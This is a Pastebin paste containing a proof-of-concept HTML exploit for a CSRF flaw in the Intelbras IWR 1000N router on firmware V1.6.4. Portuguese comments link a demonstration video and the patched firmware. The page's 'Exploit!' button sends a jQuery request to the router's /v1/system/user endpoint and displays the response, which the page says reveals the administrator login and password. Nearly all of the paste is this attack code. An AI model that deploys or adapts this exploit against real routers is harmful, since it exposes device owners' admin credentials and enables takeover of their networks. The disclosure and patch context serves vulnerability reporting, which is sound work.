AdSEbr

CSRF Intelbras IWR1000N | Firmware V1.6.4

Oct 11th, 2019
2,158
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // VÍDEO DEMONSTRATIVO: https://www.youtube.com/watch?v=NcxFX37LXOc
  2. // PARA CORRIGIR O PROBLEMA ATUALIZE O FIRMWARE DO SEU ROTEADOR NO LINK ABAIXO:
  3. // http://backend.intelbras.com/sites/default/files/2019-07/IWR%201000N%20-%20Firmware%20vers%C3%A3o%201.9.4_0.zip
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10. <!DOCTYPE html>
  11. <html lang="en">
  12.     <head>
  13.             <meta charset="UTF-8">
  14.             <meta name="viewport" content="width=device-width, initial-scale=1.0">
  15.             <meta http-equiv="X-UA-Compatible" content="ie=edge">
  16.             <title>IWR 1000N V1.6.4- CSRF on authenticated administrator</title>
  17.     </head>
  18.     <body>
  19.         <button onclick="exploit()">Exploit!</button>
  20.         <p>Click the button to get the login and password.</p>
  21.         <script>
  22.             function exploit(){
  23.                 $.get( "http://localhost:80/v1/system/user" )
  24.                 .done(( data ) => {
  25.                     alert( data );
  26.                 })
  27.                 .fail(function( err, status) {
  28.                     alert( status );
  29.                 });
  30.             }
  31.         </script>
  32.         <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  33.     </body>
  34. </html>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×